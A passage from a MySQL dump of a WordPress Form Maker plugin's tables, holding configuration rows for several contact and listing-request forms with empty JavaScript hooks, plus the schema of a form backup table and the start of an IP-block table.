\r\n}','','',0,'%all%','%all%',6,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Phone:#**label**#type_phone#****#4#**id**#Message:#**label**#type_textarea#****#5#**id**#type_submit_reset_5#**label**#type_submit_reset#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Phone:#**label**#type_phone#****#4#**id**#Message:#**label**#type_textarea#****#5#**id**#type_submit_reset_5#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*5*:*id*:*type_submit_reset*:*type*:*type_submit_reset_5*:*w_field_label*:*Submit Form*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1),(15,'User Credentials','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"1\" class=\"wdform_row\">%1 - Name:%</div></div></div><div wdid=\"2\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%2 - custom_2%</div><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"3\" class=\"wdform_row\">%3 - custom_3%</div></div></div><div wdid=\"4\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%4 - custom_4%</div><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"5\" class=\"wdform_row\">%5 - E-mail:%</div><div wdid=\"6\" class=\"wdform_row\">%6 - Phone:%</div><div wdid=\"7\" class=\"wdform_row\">%7 - Mobile Phone Number:%</div><div wdid=\"8\" class=\"wdform_row\">%8 - Address:%</div><div wdid=\"14\" class=\"wdform_row\">%14 - Message Inquiry / Comments:%</div><div wdid=\"15\" class=\"wdform_row\">%15 - type_submit_reset_15%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',34,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}','','',0,'%all%','%all%',16,1,'1#**id**#Name:#**label**#type_name#****#3#**id**#custom_3#**label**#type_editor#****#5#**id**#E-mail:#**label**#type_submitter_mail#****#6#**id**#Phone:#**label**#type_phone#****#7#**id**#Mobile Phone Number:#**label**#type_phone#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#14#**id**#Message Inquiry / Comments:#**label**#type_textarea#****#15#**id**#type_submit_reset_15#**label**#type_submit_reset#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#3#**id**#custom_3#**label**#type_editor#****#5#**id**#E-mail:#**label**#type_submitter_mail#****#6#**id**#Phone:#**label**#type_phone#****#7#**id**#Mobile Phone Number:#**label**#type_phone#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#14#**id**#Message Inquiry / Comments:#**label**#type_textarea#****#15#**id**#type_submit_reset_15#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*2*:*id*:*type_section_break*:*type*:*custom_2*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*3*:*id*:*type_editor*:*type*:*custom_3*:*w_field_label*:*<h3>            How do we contact you          </h3>*:*w_editor*:**:*new_field*:*4*:*id*:*type_section_break*:*type*:*custom_4*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*5*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:*ex: myname@example.com*:*w_first_val*:*ex: myname@example.com*:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*6*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*7*:*id*:*type_phone*:*type*:*Mobile Phone Number:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*8*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*14*:*id*:*type_textarea*:*type*:*Message Inquiry / Comments:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*15*:*id*:*type_submit_reset*:*type*:*type_submit_reset_15*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1),(16,'Simple Contact Captcha','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"1\" class=\"wdform_row\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row\">%2 - E-mail:%</div><div wdid=\"3\" class=\"wdform_row\">%3 - Phone:%</div><div wdid=\"4\" class=\"wdform_row\">%4 - type_submit_reset_4%</div></div><div class=\"wdform_column\"><div wdid=\"5\" class=\"wdform_row\">%5 - Enter the message as it&#039;s shown:%</div><div wdid=\"6\" class=\"wdform_row\">%6 - Message:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',19,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}','','',0,'%all%','%all%',7,1,'1#**id**#Name:#**label**#type_text#****#2#**id**#E-mail:#**label**#type_text#****#3#**id**#Phone:#**label**#type_phone#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#5#**id**#Enter the message as it&#039;s shown:#**label**#type_captcha#****#6#**id**#Message:#**label**#type_textarea#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_text#****#2#**id**#E-mail:#**label**#type_text#****#3#**id**#Phone:#**label**#type_phone#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#5#**id**#Enter the message as it&#039;s shown:#**label**#type_captcha#****#6#**id**#Message:#**label**#type_textarea#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*new_field*:*2*:*id*:*type_text*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*3*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_submit_reset*:*type*:*type_submit_reset_4*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*5*:*id*:*type_captcha*:*type*:*Enter the message as it&#039;s shown:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*6*:*w_digit*:**:*w_class*:**:*new_field*:*6*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1),(17,'Advanced Contact Form','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"1\" class=\"wdform_row\">%1 - custom_1%</div><div wdid=\"2\" class=\"wdform_row\">%2 - Pub/Brewery Name:%</div><div wdid=\"3\" class=\"wdform_row\">%3 - Full Name:%</div><div wdid=\"4\" class=\"wdform_row\">%4 - Address:%</div><div wdid=\"10\" class=\"wdform_row\">%10 - E-mail:%</div><div wdid=\"11\" class=\"wdform_row\">%11 - Phone Number:%</div><div wdid=\"12\" class=\"wdform_row\">%12 - Custom Message (If selected above):%</div><div wdid=\"13\" class=\"wdform_row\">%13 - type_submit_reset_13%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',24,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}','','',0,'%all%','%all%',14,1,'1#**id**#custom_1#**label**#type_editor#****#2#**id**#Pub/Brewery Name:#**label**#type_text#****#3#**id**#Full Name:#**label**#type_name#****#4#**id**#Street Address#**label**#type_address#****#5#**id**#Street Address Line 2#**label**#type_address#****#6#**id**#City#**label**#type_address#****#7#**id**#State / Province / Region#**label**#type_address#****#8#**id**#Postal / Zip Code#**label**#type_address#****#9#**id**#Country#**label**#type_address#****#10#**id**#E-mail:#**label**#type_submitter_mail#****#11#**id**#Phone Number:#**label**#type_phone#****#12#**id**#Custom Message (If selected above):#**label**#type_textarea#****#13#**id**#type_submit_reset_13#**label**#type_submit_reset#****##**id**##**label**##****#','1#**id**#custom_1#**label**#type_editor#****#2#**id**#Pub/Brewery Name:#**label**#type_text#****#3#**id**#Full Name:#**label**#type_name#****#4#**id**#Street Address#**label**#type_address#****#5#**id**#Street Address Line 2#**label**#type_address#****#6#**id**#City#**label**#type_address#****#7#**id**#State / Province / Region#**label**#type_address#****#8#**id**#Postal / Zip Code#**label**#type_address#****#9#**id**#Country#**label**#type_address#****#10#**id**#E-mail:#**label**#type_submitter_mail#****#11#**id**#Phone Number:#**label**#type_phone#****#12#**id**#Custom Message (If selected above):#**label**#type_textarea#****#13#**id**#type_submit_reset_13#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_editor*:*type*:*custom_1*:*w_field_label*:*<h2>Featured PubQuest Listing Request</h2><br>*:*w_editor*:**:*new_field*:*2*:*id*:*type_text*:*type*:*Pub/Brewery Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*new_field*:*3*:*id*:*type_name*:*type*:*Full Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*yes*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*10*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*11*:*id*:*type_phone*:*type*:*Phone Number:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*12*:*id*:*type_textarea*:*type*:*Custom Message (If selected above):*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*13*:*id*:*type_submit_reset*:*type*:*type_submit_reset_13*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1),(18,'Contact Form with Map','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"1\" class=\"wdform_row\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row\">%2 - E-mail:%</div><div wdid=\"3\" class=\"wdform_row\">%3 - Message:%</div><div wdid=\"4\" class=\"wdform_row\">%4 - type_submit_reset_4%</div><div wdid=\"5\" class=\"wdform_row\">%5 - map_5%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',20,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}','','',0,'%all%','%all%',6,1,'1#**id**#Name:#**label**#type_text#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Message:#**label**#type_textarea#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#5#**id**#map_5#**label**#type_map#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_text#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Message:#**label**#type_textarea#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#5#**id**#map_5#**label**#type_map#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_submit_reset*:*type*:*type_submit_reset_4*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*5*:*id*:*type_map*:*type*:*map_5*:*w_field_label*:*2.2942540000000236*:*w_center_x*:*48.858334*:*w_center_y*:*2.294254*:*w_long*:*48.858334*:*w_lat*:*13*:*w_zoom*:*400*:*w_width*:*300*:*w_height*:**:*w_info*:*wdform_map*:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1);
/*!40000 ALTER TABLE `lwz_formmaker` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_formmaker_backup`
--

DROP TABLE IF EXISTS `lwz_formmaker_backup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_formmaker_backup` (
  `backup_id` int(11) NOT NULL AUTO_INCREMENT,
  `cur` int(1) NOT NULL,
  `id` int(11) NOT NULL,
  `title` varchar(127) NOT NULL,
  `mail` varchar(128) NOT NULL,
  `form_front` longtext NOT NULL,
  `theme` int(11) NOT NULL,
  `javascript` text NOT NULL,
  `submit_text` longtext NOT NULL,
  `url` varchar(200) NOT NULL,
  `submit_text_type` tinyint(4) NOT NULL,
  `script_mail` text NOT NULL,
  `script_mail_user` text NOT NULL,
  `counter` int(11) NOT NULL,
  `published` int(11) NOT NULL DEFAULT '1',
  `label_order` text NOT NULL,
  `label_order_current` text NOT NULL,
  `article_id` varchar(500) NOT NULL,
  `pagination` varchar(128) NOT NULL,
  `show_title` varchar(128) NOT NULL,
  `show_numbers` varchar(128) NOT NULL,
  `public_key` varchar(50) NOT NULL,
  `private_key` varchar(50) NOT NULL,
  `recaptcha_theme` varchar(20) NOT NULL,
  `paypal_mode` int(2) NOT NULL,
  `checkout_mode` varchar(20) NOT NULL,
  `paypal_email` varchar(50) NOT NULL,
  `payment_currency` varchar(20) NOT NULL,
  `tax` float NOT NULL,
  `form_fields` longtext NOT NULL,
  `savedb` tinyint(4) NOT NULL DEFAULT '1',
  `sendemail` tinyint(4) NOT NULL DEFAULT '1',
  `requiredmark` varchar(20) NOT NULL DEFAULT '*',
  `from_mail` varchar(128) NOT NULL,
  `from_name` varchar(128) NOT NULL,
  `reply_to` varchar(128) NOT NULL,
  `send_to` varchar(128) NOT NULL,
  `autogen_layout` tinyint(4) NOT NULL DEFAULT '1',
  `custom_front` longtext NOT NULL,
  `mail_from_user` varchar(128) NOT NULL,
  `mail_from_name_user` varchar(128) NOT NULL,
  `reply_to_user` varchar(128) NOT NULL,
  `condition` text NOT NULL,
  `mail_cc` varchar(128) NOT NULL,
  `mail_cc_user` varchar(128) NOT NULL,
  `mail_bcc` varchar(128) NOT NULL,
  `mail_bcc_user` varchar(128) NOT NULL,
  `mail_subject` varchar(128) NOT NULL,
  `mail_subject_user` varchar(128) NOT NULL,
  `mail_mode` tinyint(4) NOT NULL DEFAULT '1',
  `mail_mode_user` tinyint(4) NOT NULL DEFAULT '1',
  `mail_attachment` tinyint(4) NOT NULL DEFAULT '1',
  `mail_attachment_user` tinyint(4) NOT NULL DEFAULT '1',
  `user_id_wd` varchar(220) NOT NULL,
  `sortable` int(11) NOT NULL,
  `frontend_submit_fields` text NOT NULL,
  `frontend_submit_stat_fields` text NOT NULL,
  `mail_emptyfields` tinyint(4) NOT NULL DEFAULT '0',
  `mail_verify` tinyint(4) NOT NULL DEFAULT '0',
  `mail_verify_expiretime` float NOT NULL,
  `mail_verification_post_id` int(11) NOT NULL,
  `save_uploads` tinyint(4) NOT NULL DEFAULT '1',
  PRIMARY KEY (`backup_id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_formmaker_backup`
--

LOCK TABLES `lwz_formmaker_backup` WRITE;
/*!40000 ALTER TABLE `lwz_formmaker_backup` DISABLE KEYS */;
INSERT INTO `lwz_formmaker_backup` VALUES (1,0,3,'Simple Contact','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column\"><div wdid=\"1\" class=\"wdform_row\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row\">%2 - E-mail:%</div><div wdid=\"3\" class=\"wdform_row\">%3 - Website%</div><div wdid=\"4\" class=\"wdform_row\">%4 - type_submit_reset_4%</div></div><div class=\"wdform_column\"><div wdid=\"5\" class=\"wdform_row\">%5 - Message:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',16,'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}','','',0,'%all%','%all%',6,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Website#**label**#type_text#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#5#**id**#Message:#**label**#type_textarea#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Website#**label**#type_text#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#5#**id**#Message:#**label**#type_textarea#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Website*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*4*:*id*:*type_submit_reset*:*type*:*type_submit_reset_4*:*w_field_label*:*Send Now!*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*5*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1),(2,1,3,'Simple Contact','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail:%</div><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - Message:%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - type_submit_reset_4%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',16,'// before form is load\nfunction before_load() {	\n}	\n// before form submit\nfunction before_submit() {\n}	\n// before form reset\nfunction before_reset() {	\n}','','',0,'%all%','%all%',6,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#5#**id**#Message:#**label**#type_textarea#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#3#**id**#Website#**label**#type_text#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#5#**id**#Message:#**label**#type_textarea#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*5*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_submit_reset*:*type*:*type_submit_reset_4*:*w_field_label*:*Send Now!*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1);
/*!40000 ALTER TABLE `lwz_formmaker_backup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_formmaker_blocked`
--

DROP TABLE IF EXISTS `lwz_formmaker_blocked`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_formmaker_blocked` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `ip` varchar(128) NOT NULL,
